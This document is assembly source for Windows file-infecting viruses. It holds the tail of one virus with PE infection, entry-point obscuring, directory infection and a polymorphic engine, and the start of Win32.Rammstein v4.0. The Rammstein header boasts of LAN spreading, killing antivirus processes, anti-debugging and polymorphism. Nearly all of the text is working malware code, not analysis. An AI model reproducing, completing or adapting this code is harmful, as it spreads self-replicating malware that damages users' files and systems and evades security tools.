rep movsb
mov ecx,crptSecondEND-crptSecondINI
mov esi,crptSecondINI-vBegin
add esi,dword ptr [memHnd+ebp]
secondEnLayerLoop:
not byte ptr [esi]
inc esi
loop secondEnLayerLoop
push esi
push esi
call dword ptr [_GetFileAttributesA+ebp]
pop esi
inc eax
jz infectionError
dec eax
push esi
push 00000080h
push esi
call dword ptr [_SetFileAttributesA+ebp]
pop esi
or eax,eax
jz infectionError
xor eax,eax
push eax
push 00000080h
push 00000003h
push eax
push eax
push 80000000h OR 40000000h
push esi
call dword ptr [_CreateFileA+ebp]
inc eax
jz infectionErrorAttrib
dec eax
push 0h
push eax
call dword ptr [_GetFileSize+ebp]
inc eax
jz infectionErrorClose
dec eax
lea edi,fileTime2+ebp
push edi
lea edi,fileTime1+ebp
push edi
lea edi,fileTime0+ebp
push edi
push dword ptr [fHnd+ebp]
call dword ptr [_GetFileTime+ebp]
or eax,eax
jz infectionErrorClose
xor eax,eax
push eax
push eax
push eax
push 00000004h
push eax
push dword ptr [fHnd+ebp]
call dword ptr [_CreateFileMappingA+ebp]
or eax,eax
jz infectionErrorClose
xor eax,eax
push eax
push eax
push eax
push 00000004h OR 00000002h
push dword ptr [fhmap+ebp]
call dword ptr [_MapViewOfFile+ebp]
or eax,eax
jz infectionErrorCloseMap
mov edi,eax
cmp word ptr [edi],'ZM'
jne infectionErrorCloseUnmap
mov edx,edi
mov esi,edi
mov eax,18h
add ax,word ptr [edi+14h]
add edi,eax
mov dword ptr [fstSec+ebp],edi
push edx
mov cx,word ptr [esi+06h]
mov ax,28h
dec cx
mul cx
add edi,eax
pop edx
jmp yeahEPO
notEPO:
call lightEPO ; try light EPO
jc notNotEPO
notNotEPO:
; if i can't found a nice call to patch and i can't add
; a jump in the end of the code section i use the non-EPO
; infection. This could be a problem for the wild time
; of the virus 'cause heuristics can fake it easily
; but we want to be infectious ;)
push edi ; store new ep and get old
mov edi,dword ptr [myRVA+ebp] ; set edi=new ep
mov dword ptr [EPOAddr+ebp],0 ; getk32 changes if epo!
xor eax,eax
push eax
push dword ptr [pad+ebp]
push eax
push 00000004h
push eax
push dword ptr [fHnd+ebp]
call dword ptr [_CreateFileMappingA+ebp]
or eax,eax
jz infectionErrorClose
xor eax,eax
push dword ptr [pad+ebp]
push eax
push eax
push 00000004h OR 00000002h
push dword ptr [fhmap+ebp]
call dword ptr [_MapViewOfFile+ebp]
or eax,eax
jz infectionErrorCloseMap
infectionErrorCloseUnmap:
push dword ptr [mapMem+ebp]
call dword ptr [_UnmapViewOfFile+ebp]
infectionErrorCloseMap:
push dword ptr [fhmap+ebp]
call dword ptr [_CloseHandle+ebp]
lea edi,fileTime2+ebp
push edi
lea edi,fileTime1+ebp
push edi
lea edi,fileTime0+ebp
push edi
push dword ptr [fHnd+ebp]
call dword ptr [_SetFileTime+ebp]
infectionErrorClose:
push dword ptr [fHnd+ebp]
call dword ptr [_CloseHandle+ebp]
infectionErrorAttrib:
push dword ptr [fileAttrib+ebp]
push dword ptr [fNameAddr+ebp]
call dword ptr [_SetFileAttributesA+ebp]
infectionError:
popad
ret
;
; This my 'search EPO' routine. Searches for a call into the code section
; that points to:
;
; push ebp
; mov ebp,esp
;
; This is the way the high level lenguages get the arguments used to call
; a procedure. If this code is found i assume the call found it's correct
; and i patch it to jump into the virus.
;
; I tested selecting the call randomly, but this is not needed. There
; could be calls that points the desired code and call that are not
; useful for the virus. Av cannot know wich is the call patched utill
; it finds it. Moreover using 1st found call i'm more sure that the virus
; will be executed! And this is good enought to fuck most cool heuristics.
;
searchEPO:
pushad
mov edi,dword ptr [esi+28h] ; get host EP
xor ecx,ecx
mov cx,word ptr [esi+06h] ; number of sections
mov esi,dword ptr [fstSec+ebp] ; get 1st section addr
sectionFound:
test dword ptr [esi+24h],10000000h ; avoid this kind of section
jnz searchEPOFail ; we can corrupt it!
push esi
sub edi,dword ptr [esi+0ch] ; get raw address
add edi,dword ptr [esi+14h]
mov ecx,dword ptr [esi+10h]
cmp ecx,edi
jna searchEPOFail
sub ecx,edi
add edi,dword ptr [mapMem+ebp]
mov ebx,edi
add ebx,ecx
sub ebx,10h ; high secure fence
callLoop: ; loop that searches
cmp byte ptr [edi],0e8h ; for the call
jne continueCallLoop
mov edx,edi
add edx,dword ptr [edi+1]
add edx,5
cmp ebx,edx
jb continueCallLoop
cmp edx,dword ptr [mapMem+ebp]
jb continueCallLoop
mov esi,edx
mov dx,word ptr [esi]
cmp dx,08b55h
jne continueCallLoop
mov dx,word ptr [esi+1]
cmp dx,0ec8bh
jne continueCallLoop
mov dword ptr [EPOAddr+ebp],edi
sub edi,dword ptr [mapMem+ebp]
pop esi
add edi,dword ptr [esi+0ch] ; get rva address
sub edi,dword ptr [esi+14h]
mov dword ptr [EPORva+ebp],edi
clc
jmp searchEPOOut
continueCallLoop:
inc edi
loop callLoop
searchEPOFail:
pop esi
stc
searchEPOOut:
popad
ret
;
; This makes a light EPO. Looks for space in the code section to
; put there a jump to virus code. The header is patched but this
; patch is less notorious. This EPO requires phys size of section
; bigger than virtual size + 5 (the size of the jump).
;
lightEPO:
pushad
mov edi,dword ptr [esi+28h] ; get host EP
xor ecx,ecx
mov cx,word ptr [esi+06h] ; number of sections
mov esi,dword ptr [fstSec+ebp] ; get 1st section addr
lightSectionFound:
test dword ptr [esi+24h],10000000h ; avoid this kind of section
jnz lightEPOFail ; we can corrupt it!
mov eax,dword ptr [esi+08h] ; virtual size
add eax,5 ; plus the code we add
cmp eax,dword ptr [esi+10h] ; bigger than phys size?
ja lightEPOFail
mov edi,dword ptr [mapMem+ebp] ; get raw address
add edi,dword ptr [esi+08h]
add edi,dword ptr [esi+14h]
mov dword ptr [esi+08h],eax ; increase 5 bytes
mov dword ptr [EPOAddr+ebp],edi
sub edi,dword ptr [mapMem+ebp]
add edi,dword ptr [esi+0ch] ; get rva address
sub edi,dword ptr [esi+14h]
mov dword ptr [EPORva+ebp],edi
clc
lightEPOOut:
popad
ret
;
; Infects PE files in current directory.
;
infectDir:
pushad
lea esi,find_data+ebp
push esi
lea esi,fndMask+ebp
push esi
call dword ptr [_FindFirstFileA+ebp]
inc eax
jz notFound
dec eax
findNext:
lea esi,find_data.cFileName+ebp
call stringUp
lea esi,stringBuffer+ebp
push edi ; test the string it's
sub edi,esi ; long enought
cmp edi,5
pop edi
jna skipThisFile
cmp dword ptr [edi-4],'EXE.'
je validFileExt
cmp dword ptr [edi-4],'RCS.'
jne skipThisFile
validFileExt:
mov eax,dword ptr [find_data.nFileSizeLow+ebp]
cmp eax,4000h
jb skipThisFile ; at least 4000h bytes?
mov ecx,PADDING ; test if it's infected
xor edx,edx ; yet
div ecx
or edx,edx ; reminder is zero?
jz skipThisFile
call infect
skipThisFile:
lea esi,find_data+ebp
push esi
push dword ptr [findHnd+ebp]
call dword ptr [_FindNextFileA+ebp] ; Find next file
or eax,eax
jnz findNext
notFound:
popad
ret
;
; Virus data ---------------------------------------------------------------
;
HOOKTABLEBEGIN label byte
dd offset _CreateFileA
dd offset Hook0
dd offset _MoveFileA
dd offset Hook1
dd offset _CopyFileA
dd offset Hook2
dd offset _CreateProcessA
dd offset Hook3
dd offset _SetFileAttributesA
dd offset Hook4
dd offset _GetFileAttributesA
dd offset Hook5
dd offset _SearchPathA
dd offset Hook6
HOOKTABLEEND label byte
EPOAddr dd 0
; little tribute
message db 'ASIMOV Jan.2.1920 - Apr.6.1992',0
CrcCreatFileMappingA dd 096b2d96ch
db 19
_CreateFileMappingA dd 0
CrcUnmapViewOfFile dd 094524b42h
db 16
_UnmapViewOfFile dd 0
CrcCloseHandle dd 068624a9dh
db 12
_CloseHandle dd 0
CrcFindFirstFileA dd 0ae17ebefh
db 15
_FindFirstFileA dd 0
CrcFindNextFileA dd 0aa700106h
db 14
_FindNextFileA dd 0
CrcFindClose dd 0c200be21h
db 10
_FindClose dd 0
CrcVirtualAlloc dd 04402890eh
db 13
_VirtualAlloc dd 0
CrcGetTickCount dd 0613fd7bah
db 13
_GetTickCount dd 0
CrcGetFileTime dd 04434e8feh
db 12
_GetFileTime dd 0
CrcSetFileTime dd 04b2a3e7dh
db 12
_SetFileTime dd 0
CrcSetFileAttributesA dd 03c19e536h
db 19
_SetFileAttributesA dd 0
CrcGetFileAttributesA dd 0c633d3deh
db 19
_GetFileAttributesA dd 0
CrcGetFileSize dd 0ef7d811bh
db 12
_GetFileSize dd 0
CrcGetSystemTime dd 075b7ebe8h
db 14
_GetSystemTime dd 0
CrcFatalAppExitA dd 0253ab1b9h
db 14
_FatalAppExitA dd 0
CrcMoveFileA dd 02308923fh
db 10
_MoveFileA dd 0
CrcCopyFileA dd 05bd05db1h
db 10
_CopyFileA dd 0
CrcCreateProcessA dd 0267e0b05h
db 15
_CreateProcessA dd 0
CrcSearchPathA dd 0f4d9d033h
db 12
_SearchPathA dd 0
CrcGetCurrentDirectoryA dd 0ebc6c18bh
db 21
_GetCurrentDirectoryA dd 0
CrcSetCurrentDirectoryA dd 0b2dbd7dch
db 21
_SetCurrentDirectoryA dd 0
CrcGetWindowsDirectoryA dd 0fe248274h
db 21
_GetWindowsDirectoryA dd 0
ENDAPI label byte
;
; Polymorphic Engine (V2LPE - Very^2 Lame Polymorphic Engine)
;
; This is a simple polymorphic engine. Uses some piezes of code from
; AOCPE. Very, very lame :( But does its work as poly engine. May be
; its size the only one point for.
;
; EAX: CrptKey
; ECX: CodeSize (code to decrypt prepared yet)
; EDI: Destination address
;
; returns EAX: size of generated proc
;
GenDCrpt:
pushad ; setup regs status
xor eax,eax
lea edi,RegStatus+ebp
mov ecx,8
rep stosb
popad
mov byte ptr [RegStatus+ebp+_EBP],1
mov byte ptr [RegStatus+ebp+_ESP],1
mov dword ptr [CrptKey+ebp],eax
mov dword ptr [CodeSize+ebp],ecx
push edi
xor eax,eax
call GetReg
mov byte ptr [KeyReg+ebp],al
call AddShit
mov cl,_EBP
call AddPushREG
call AddShit
mov ax,0ec8bh
stosw
call AddShit
mov edx,04h
mov cl,_EBP
call AddMovREGMEMEBP
call AddShit
call AddShit
call AddShit
call GetReg
mov byte ptr [LoopReg+ebp],al
mov cl,al
call AddPushREG
call AddShit
call AddShit
push edi
call AddShit
mov cl,_EBP
mov edx,04h
call AddAddREGINM
call AddShit
pop ebx
mov eax,edi
sub eax,ebx
push eax
mov al,75h
stosb
pop eax
mov ah,0feh
xchg al,ah
sub al,ah
stosb
call AddShit
call AddShit
call AddShit
mov cl,_EBP
call AddPopREG
call AddShit
mov al,0c3h
stosb
pop esi
sub edi,esi
mov eax,edi
ret
;
; Poly engine data
;
_EAX equ 0
_ECX equ 1
_EDX equ 2
_EBX equ 3
_ESP equ 4
_EBP equ 5
_ESI equ 6
_EDI equ 7
RegStatus db 8 dup(0)
KeyReg db 0
LoopReg db 0
CrptKey dd 0
CodeSize dd 0
Rnd db ?
;
; returns AL: selected register
;
GetReg:
xor eax,eax
mov al,byte ptr [CrptKey+ebp]
GetReg1:
and al,7
lea ecx,RegStatus+ebp
add ecx,eax
mov dl,byte ptr [ecx]
or dl,dl
jz GetReg0
inc al
jmp GetReg1
GetReg0:
mov byte ptr [ecx],1
ret
;
; AL: selected register to free
;
FreeReg:
and eax,7
lea ecx,RegStatus+ebp
add ecx,eax
mov byte ptr [ecx],0
ret
;
; Instruction generators
;
; EDI: Destination code
; ECX: Reg (if applicable)
; EDX: Inm (if applicable)
;
AddPushREG:
mov al,050h
add al,cl
stosb
ret
AddPopREG:
mov al,058h
add al,cl
stosb
ret
AddMovREGINM:
mov al,0b8h
add al,cl
stosb
mov eax,edx
stosd
ret
AddMovREGMEMEBP:
mov al,08bh
stosb
mov al,08h
mul cl
add al,85h
stosb
mov eax,edx
stosd
ret
AddXorMEMEBPREG:
mov al,031h
stosb
mov al,08h
mul cl
add al,45h
stosb
xor al,al
stosb
ret
AddAddREGINM:
or cl,cl
jnz AddAddREGINM0
mov al,05h
stosb
jmp AddAddREGINM1
AddAddREGINM0:
mov al,081h
stosb
mov al,0c0h
add al,cl
stosb
AddAddREGINM1:
mov eax,edx
stosd
ret
AddSubREGINM:
or cl,cl
jnz AddSubREGINM0
mov al,2dh
stosb
jmp AddSubREGINM1
AddSubREGINM0:
mov al,081h
stosb
mov al,0e8h
add al,cl
stosb
AddSubREGINM1:
mov eax,edx
stosd
ret
;
; Yet another lame shit generator by Bumblebee ;)
;
AddShit:
mov eax,dword ptr [CrptKey+ebp]
add byte ptr [Rnd+ebp],al
and al,1
jz AddShit2
xor eax,eax
mov al,byte ptr [Rnd+ebp]
lea edx,shit0+ebp
and al,7
mov cl,2
mul cl
add edx,eax
mov ax,word ptr [edx]
stosw
lea edx,shit1+ebp
mov al,byte ptr [Rnd+ebp]
and al,3
mov cl,2
mul cl
add edx,eax
mov ax,word ptr [edx]
stosw
stosw
ret
AddShit2:
xor eax,eax
mov al,byte ptr [Rnd+ebp]
lea edx,shit0+ebp
and al,7
mov cl,2
mul cl
add edx,eax
mov ax,word ptr [edx]
stosw
lea edx,shit0+ebp
add edx,2
mov al,byte ptr [Rnd+ebp]
and al,3
mov cl,2
mul cl
add edx,eax
mov ax,word ptr [edx]
stosw
ret
; some do-nothing opcodes
shit0: dw 9090h,0db87h,0c987h,0d287h,4840h,434bh,4941h,4a42h
shit1: dw 0d0f7h,0d3f7h,0d1f7h,0d2f7h
; This is a fake decryptor for the 1st generation. Allows the virus to
; skip the second layer decryptor.
crypt:
pop edx
lea edx,crptSecondINI
push edx
ret
;
; Temp data. Not stored into the file, only 1st generation.
;
BUFFERBEGIN label byte
stringBuffer db STRINGTOP dup(0)
tmpPath db STRINGTOP dup(0)
address dd 0
names dd 0
ordinals dd 0
nexports dd 0
expcount dd 0
memHnd dd 0
fHnd dd 0
fhmap dd 0
mapMem dd 0
fileSize dd 0
fileAttrib dd 0
fileTime0 dd 0,0
fileTime1 dd 0,0
fileTime2 dd 0,0
pad dd 0
fNameAddr dd 0
gensize dd 0
virtsize dd 0
myRVA dd 0
fstSec dd 0
find_data WIN32_FIND_DATA <0>
findHnd dd 0
semHook db 0
EPORva dd 0
BUFFEREND label byte
BUFFERSIZE equ BUFFEREND-BUFFERBEGIN
;
; For 1st generation only.
;
fakeHost:
push 0h
call ExitProcess
Ends
End inicio
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[RAMM.ASM]ÄÄÄ
comment $
ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
ÛÛß ßÛß ßÛß ßÛÛ
ÛÛ Û Û Û Û Û ÛÛ
ÛÛÛßßß ÜÛÜ Û ÛÛ
ÛÛ ßßßßÛßßßß Û Û ÛÛ
ÛÛ Û ÜÛ Û ÛÛ
ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
v4.0
= Final Release =
===================================================================
DISCLAIMER
====================================================================
History:
09 Sep 2000 - Today I made a small improvement. When the dropper roams
the net onto another computer it remains in the windows
dir and it represents a weak point which might be noticed
by an av. So, now, the virus will smartly remove either
the dropper or the entry in the win.ini file if one of
them is missing. If both are there, they are left alone
because they will remove eachother. Added Pstores.exe to
the black list. Thanks to Evul for pointing me out that
it is a rather peculiar file and cannot be safely
infected.
22 Jul 2000 - The virus has moved up to version 4.0. Today I added
the network infector. It comes in a separate thread.
For the moment looks like everything works fine. Will
add a timer to it so that it does not hang in huge
networks... Virus is above 13k now... Waiting for the
LZ!
22 May 2000 - Added EPO on files that have the viral code outside the
code section. Basically from now on the entry point stays
only into the code section. The epo is not actually epo,
because as I started to code it I decided to make it very
complicated so I will include the complicated part in the
next release. It will be the so called LJILE32 <Lord
Julus' Instruction Length Engine 32>. This engine will
allow me to have an exact location of the opcode for each
instruction so we will be able to look up any call, jump
or conditional jump to place our code call there. So for
this version only a jump at the original eip.
21 May 2000 - Fixed a bug in the api hooker... I forgot that some import
sections have a null pointer to names. Also added the
infection by last section increase for files who cannot
be infected otherwise. All files should be touched now.
Also I fixed the problem with the payload window not
closing after the process closed. I solved half of it
as some files like wordpad.exe still have this problem.
====================================================================
Virus Name ........... Win32.Rammstein
Virus Version ........ 4.0
Virus Size ........... 14002 (debug), 15176 (release)
Virus Author ......... Lord Julus / 29A
Release Date ......... 30 Nov 2000
Virus type ........... PE infector
Target OS ............ Win95, Win98, WinNT, Win2000
Target Files ......... many PE file types:
EXE COM ACM CPL HDI OCX PCI
QTC SCR X32 CNV FMT OCM OLB WPC
Append Method ........ The virus will check wether there is enough room
for it inside the code section. If there is not
enough room the virus will be placed at end. If
there is it will be inserted inside the code
section at a random offset while the original
code will be saved at end. The placing at the end
has also two variants. If the last section is
Resources or Relocations the virus will insert a
new section before the last section and place the
data there, also rearranging the last section's
RVAs. If the last section is another section a
new section will be placed at end. The name of
the new section is a common section name which is
choosed based on the existing names so that it
does not repeat. If the virus is placed at the
end just a small EPO code is used so that the eip
stays inside the code section.
A special situation occurs if there is no enough
space to add a new section header, for example
when the code section starts at RVA 200 (end of
headers). In this situation the virus will
increase the last section in order to append.
Infect Methods ....... -Direct file attacks: the virus will attack
specific files in the windows directory, files
which are most used by people
-Directory scan: all files in the current
directory will be infected, as well as 3 files in
the system directory and 3 in the windows
directory
-Api hooking (per-process residency): the virus
hooks a few api calls and infects files as the
victim uses the apis
-Intranet spreading: the virus spreads into the
LAN using only windows apis
Features ............. Multiple threads: the virus launches a main
thread. While this thread executes, in the same
time, the original thread returns to host, so no
slowing down appears. The main viral thread
launches other 6 threads and monitors their
execution. If one of the threads is not able to
finish the system is hanged because it means
somebody tryied to patch some of the thread code.
Heavy anti-debugging: i tried to use almost all
the anti-debug and anti-emulation stuff that I
know
FPU: uses fpu instructions
Crc32 search: uses crc32 to avoid waste of space
Memory roaming: allocates virtual memory and
jumps in it
Interlaced code: this means that some threads
share the same piece of code and the virus is
careful to let only one in the same time
otherwise we get some of the variables distroyed.
Preety hard to be emulated by avs.
Also features semaphores, timers
Marks infection using the Pythagoreic numbers.
SEH: the virus creates 9 SEH handlers, for each
thread and for the main thread.
(*) Polymorphic .......... Yes (2 engines: Modularis, LJFPE32)
(*) Metamorphic .......... Yes (mild custom metamorphic engine)
Encrypted ............ Yes
Safety ............... Yes (avoids infecting many files)
Kill AV Processes .... Yes
Payload .............. On 14th every even month the infected process
will launch a thread that will display random
windows with some of the Rammstein's lyrics.
Pretty annoying... Probably this is the first
virus that actually creates real windows and
processes their messages. The windows shut down
as the victim process closes.
Debug notes: please note that this source code features many ways of
debugging. You may turn on and off most of the virus's features by
turning some variables to TRUE or FALSE.
====================================================================
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
.586p ;
.model flat, stdcall ;
;
extrn MessageBoxA:proc ;
extrn ExitProcess: proc ;
;
TRUE = 1 ;
FALSE = 0 ;
DEBUG = TRUE ;debug on?
ANTIEMU = TRUE ;anti-debuggin/emulation?
JUMP = TRUE ;allocate and jump in mem?
DIRECT = TRUE ;direct action?
ANTIAV = TRUE ;anti-av feature?
APIHOOK = TRUE ;hook imported apis?
MAINTHREAD = TRUE ;launch a main thread?
PAYLOAD = TRUE ;use payload?
RANDOMIZE_ENTRY = TRUE ;randomize code sec entry?
EPO = TRUE ;Use EPO
MMX = FALSE ;
NETWORKINFECTION = TRUE ;
VIRUSNOTIFYENTRY = FALSE ;msgbox at virus start?
VIRUSNOTIFYEXIT = FALSE ;msgbox at virus end?
VIRUSNOTIFYHOOK = FALSE ;
MAINTHREADSEH = TRUE ;
THREAD1SEH = TRUE ;
THREAD2SEH = TRUE ;
THREAD3SEH = TRUE ;
THREAD4SEH = FALSE ;
THREAD5SEH = FALSE ;
THREAD6SEH = TRUE ;
CHECKSUM = TRUE ;
WE_ARE_LAST = 0 ;
RELOCATIONS_LAST = 1 ;
RESOURCES_LAST = 2 ;
NOT_AVAILABLE = 0 ;
AVAILABLE = 1 ;
METHOD_MOVE_CODE = 0 ;
METHOD_APPEND_AT_END = 1 ;
METHOD_INCREASE_LAST = 2 ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;
IF MMX ;
include mmx.inc ; MMX !
ENDIF ;
;
@endsz macro ;locate end of asciiz
local nextchar ;string
;
nextchar: ;
lodsb ;
test al, al ;
jnz nextchar ;
endm ;
;
include w32nt_lj.inc ;
include w32us_lj.inc ;
;
; Credits to jp, vecna, prizzy ;calculate crc32
mCRC32 equ 0C1A7F39Ah ;
mCRC32_init equ 09C3B248Eh ;
crc32 macro string ;
crcReg = mCRC32_init ;
irpc _x,<string> ;
ctrlByte = '&_x&' xor (crcReg and 0FFh)
crcReg = crcReg shr 8 ;
rept 8 ;
ctrlByte = (ctrlByte shr 1) xor (mCRC32 * (ctrlByte and 1))
endm ;
crcReg = crcReg xor ctrlByte ;
endm ;
dd crcReg ;
endm ;
;
noter macro string ;this NOTs a string
irpc _x,<string> ;
notbyte = not('&_x&') ;
db notbyte ;
endm ;
db not(0) ;
endm ;
;
PUSH_POP STRUCT ;
pop_edi dd ? ;helps us to pop stuff...
pop_esi dd ? ;
pop_ebp dd ? ;
pop_esp dd ? ;
pop_ebx dd ? ;
pop_edx dd ? ;
pop_ecx dd ? ;
pop_eax dd ? ;
PUSH_POP ENDS ;
;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;
.data ;
db 0 ;
;
.code ;
;
start: ;
IF DEBUG ;
jmp xxx ;
debug_start db 'Here is the start of the virus.',0 ;Really!! ;-)
xxx: ;
ENDIF ;
pushad ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
call getdelta ; Get the delta handle
;
getdelta: ;
pop ebp ;
sub ebp, offset getdelta ;
or ebp, ebp ;check if first gen
jnz no_first ;
mov [ebp+firstgen], 1 ;mark the first generation
jmp get_base ;
;
no_first: ;
mov [ebp+firstgen], 0 ;
;
get_base: ;
call getimagebase ; And the imagebase...
;
getimagebase: ;
pop eax ;
;
ourpoint: ;
sub eax, 1000h+(ourpoint-start)-1 ;before this eax equals
;imagebase+RVA(ourpoint)+
;RVA(code section)
;
mov dword ptr [ebp+imagebase], eax ;
mov dword ptr [ebp+ourimagebase], eax ;
jmp over_data ;
;
imagebase dd 00400000h ;
ourimagebase dd 0 ;
firstgen dd 0 ;
;
over_data: ;
cmp [ebp+firstgen], 1 ;
je EncryptedArea ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
call DecryptOffset ;very light internal
;decrypt module
DecryptOffset: ;no key, just ror/rol
pop esi ;
add esi, (EncryptedArea - DecryptOffset) ;
mov edi, esi ;
mov ecx, (end2-EncryptedArea) ;
;
DecryptLoop: ;
lodsb ;
mov ebx, ecx ;
inc bl ;
jp parity ;
ror al, cl ;
jmp do_decrypt ;
;
parity: ;
rol al, cl ;
;
do_decrypt: ;
stosb ;
loop DecryptLoop ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
EncryptedArea: ;
mov [ebp+delta], ebp ;save additional deltas
IF ANTIEMU ;
mov [ebp+delta2], ebp ;
ENDIF ;
mov eax, [ebp+imagebase] ;
mov dword ptr [ebp+adjust], eax ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
lea eax, [ebp+ExceptionExit] ; Setup a SEH frame
push eax ;
push dword ptr fs:[0] ;
mov fs:[0], esp ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
mov [ebp+copying], 0 ;reset our syncronization
mov [ebp+in_list], 0 ;variables
mov [ebp+free_routine], AVAILABLE ;
mov [ebp+crt_dir_flag], 3 ;
mov [ebp+apihookfinish], 0 ;
;
lea esi, [ebp+module_names] ;decrypt module names
mov ecx, module_names_length ;
call not_list ;
;
mov eax, [esp+28h] ;first let's locate the
lea edx, [ebp+kernel32_name] ;kernel32 base address
call LocateKernel32 ;
jc ReturnToHost ;
mov dword ptr [ebp+k32], eax ;
lea esi, dword ptr [ebp+kernel32apis] ;
lea edx, dword ptr [ebp+kernel32addr] ;
mov ecx, kernel32func ;
call LocateApis ;and kernel32 apis
jc ReturnToHost ;
;
lea edi, dword ptr [ebp+advapi32_name] ;locate advapi32
call LocateModuleBase ;
jc ReturnToHost ;
mov dword ptr [ebp+a32], eax ;
lea esi, dword ptr [ebp+advapi32apis] ;
lea edx, dword ptr [ebp+advapi32addr] ;
mov ecx, advapi32func ;
call LocateApis ;and the apis
jc ReturnToHost ;
;
lea edi, dword ptr [ebp+user32_name] ;locate user32
call LocateModuleBase ;
jc ReturnToHost ;
mov dword ptr [ebp+u32], eax ;
lea esi, dword ptr [ebp+user32apis] ;
lea edx, dword ptr [ebp+user32addr] ;
mov ecx, user32func ;
call LocateApis ;and it's apis
jc ReturnToHost ;
;
lea edi, dword ptr [ebp+gdi32_name] ;locate gdi32
call LocateModuleBase ;
jc ReturnToHost ;
mov dword ptr [ebp+g32], eax ;
lea esi, dword ptr [ebp+gdi32apis] ;
lea edx, dword ptr [ebp+gdi32addr] ;
mov ecx, gdi32func ;
call LocateApis ;and it's apis
jc ReturnToHost ;
;
lea edi, dword ptr [ebp+mpr32_name] ;locate mpr32
call LocateModuleBase ;
jc NoNetworkApis ;
mov dword ptr [ebp+m32], eax ;
lea esi, dword ptr [ebp+mpr32apis] ;
lea edx, dword ptr [ebp+mpr32addr] ;
mov ecx, mpr32func ;
call LocateApis ;and it's apis
jc NoNetworkApis ;
;
mov [ebp+netapis], TRUE ;
jmp get_img ;
;
NoNetworkApis: ;
mov [ebp+netapis], FALSE ;
;
get_img: ;
lea edi, dword ptr [ebp+img32_name] ;locate and save
call LocateModuleBase ;the checksum procedure
jc no_image ;
call @checksum ;
db "CheckSumMappedFile", 0 ;
@checksum: ;
push eax ;
call [ebp+_GetProcAddress] ;
mov [ebp+checksumfile], eax ;
;
no_image: ;
lea esi, [ebp+module_names] ;recrypt names
mov ecx, module_names_length ;
call not_list ;
;
IF VIRUSNOTIFYENTRY ;
push 0 ;
call entrytext1 ;
db 'Rammstein viral code start!', 0 ;
entrytext1: ;
call entrytext2 ;
db 'Rammstein viral code start!', 0 ;
entrytext2: ;
push 0 ;
call [ebp+_MessageBoxA] ;
ENDIF ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
call smash_dropper ;kill dropper
call getversion ;get the windoze version
;
WindowsVersion OSVERSIONINFOA <SIZE OSVERSIONINFOA>;
;
getversion: ;
call [ebp+_GetVersionExA] ;
mov byte ptr [ebp+version], al ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
mov [ebp+skipper], 0 ;
IF MMX ;
pushfd ;push flags
pop eax ;get flags
bt eax, 21h ;test for mmx presence
jnc no_mmx_present ;
mov [ebp+mmx], TRUE ;set it!
jmp done_mmx ;
;
no_mmx_present: ;
mov [ebp+mmx], FALSE ;
;
done_mmx: ;
ENDIF ;
IF JUMP ;allocate some more
;
cmp [ebp+method], METHOD_MOVE_CODE ;if code is not moved
jne restore_epo ;skip memory jump
;
call [ebp+_VirtualAlloc], 0, virussize+1000h, MEM_COMMIT+MEM_RESERVE,\
PAGE_EXECUTE_READWRITE
or eax, eax ;memory
jnz no_memory_error ;
;
